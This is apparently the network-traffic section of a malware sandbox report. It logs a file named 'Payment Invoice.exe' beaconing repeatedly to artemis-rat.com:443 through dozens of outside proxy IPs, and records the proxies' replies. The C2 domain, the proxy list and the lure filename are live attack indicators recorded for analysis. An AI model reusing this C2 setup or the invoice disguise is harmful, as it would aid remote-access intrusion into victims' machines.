                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                713192.168.2.449937103.152.112.145807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.279715061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.323724985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.324322939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.324093103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.417707920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:53.520243883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.620501041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:29.620491028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:17.714272976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                714192.168.2.44988251.81.186.179514057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.281217098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278800011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.379034996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                715192.168.2.45137651.15.223.24163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.289664030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.323726892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.324352026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.621815920 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                716192.168.2.452015103.234.159.580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.291438103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.841304064 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                717192.168.2.45221672.210.221.22341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.320070982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                718192.168.2.45212537.18.73.6055667076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.321481943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.663633108 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                719192.168.2.452291104.25.244.70807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.382430077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.537322998 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                720192.168.2.45216862.33.53.24831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.382430077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.832040071 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                721192.168.2.451392213.136.75.85590587076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.382442951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511277914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515202999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                722192.168.2.449981162.215.219.157481177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.383240938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511275053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515196085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.515310049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.620724916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:53.620472908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.620526075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:29.620517015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:17.714318037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                723192.168.2.45222598.170.57.23141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.383435011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                724192.168.2.45217137.235.48.19807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.383744001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                725192.168.2.45218445.178.133.759997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.383744955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.951523066 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                726192.168.2.45140988.84.62.541537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.385226011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                727192.168.2.45222358.75.126.23541457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.386080027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                728192.168.2.4522415.75.192.13807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.389300108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.696938992 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                729192.168.2.45222918.135.133.11631287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.390031099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.682398081 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                730192.168.2.45218393.157.248.108887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.391124964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                731192.168.2.452200146.59.18.246498717076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.392704964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.214385986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.323824883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.511653900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
